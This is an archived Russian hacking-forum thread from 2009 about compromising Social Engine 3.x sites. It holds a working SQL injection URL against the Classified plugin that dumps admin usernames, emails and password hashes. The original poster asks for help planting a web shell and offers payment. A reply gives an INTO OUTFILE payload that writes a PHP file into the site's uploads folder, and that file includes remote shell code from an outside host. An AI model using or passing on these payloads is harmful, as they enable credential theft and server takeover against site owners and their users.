Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   Social Engine SQL инекция ! (https://forum.antichat.xyz/showthread.php?t=101891)

eworld.uz 18.01.2009 16:52

Social Engine SQL инекция !
 
В движке Social Engine версия 3.хх на плагине Сlassified есть SQL инекция ! ;)

Вот sql инекция :


PHP код:

http://sitename.ru/browse_classifieds.php?s=classified_date DESC&v=0&classifiedcat_id=-1+UNION SELECT concat(admin_username,admin_email,0x3a,admin_password)
,2,3+from+se_admins 

Как залить шелл ? Помогите друзья !

Вот это скрин таблицы se_admins

http://s49.radikal.ru/i126/0901/1e/7b32166943f3.jpg

CHMOD 777 стоит в папках http://sitename.ru/uploads_user


и на http://sitename.ru/include/smarty/templates_c

Помогите друзья залить ШЕЛЛ кто сможет залить шелл стучите плиз на аску 405-801-351 в долгу не останусь :cool:

Arigona 20.01.2009 23:35

и чё с этой скуль иньекцией мона сделать? ты не разяснил, многим не понятно.

krobol 21.01.2009 03:54

получить хэши, расшифровать их и зайти в админку.

а по заливке шелла так никто и не подскажет?

NFM 21.01.2009 03:56

версия мускула какая

krobol 21.01.2009 04:03

Цитата:

Сообщение от NFM
версия мускула какая

5.0.51a

xcedz 21.01.2009 04:09

/phpMyAdmin => INTO OUTFILE ? (заливка шела в phpmyadmin ищи на форуме более кокретные примеры если требуется. ни раз поднимался вопрос)

NFM 21.01.2009 04:15

https://forum.antichat.ru/threadnav43966-1-10.html
вот здесь почитай про заливку шела

xcedz 21.01.2009 04:26

Цитата:

select '<? @include("http://shell.ru/shell.txt"); ?>' into outfile '/home/blalblalba//uploads_user/shell.php';
File_priv положение вкл

krobol 21.01.2009 04:35

phpmyadmin есть у автора темы.
у меня по его sql-inj есть только доступы к админкам.
где он взял данные по доступу к базе и phpmyadmin я не знаю.

например админка такого сайта:

<вырезано>

как можно туда залить шелл?

xcedz 21.01.2009 04:43

попробуй через шаблоны


Время: 11:58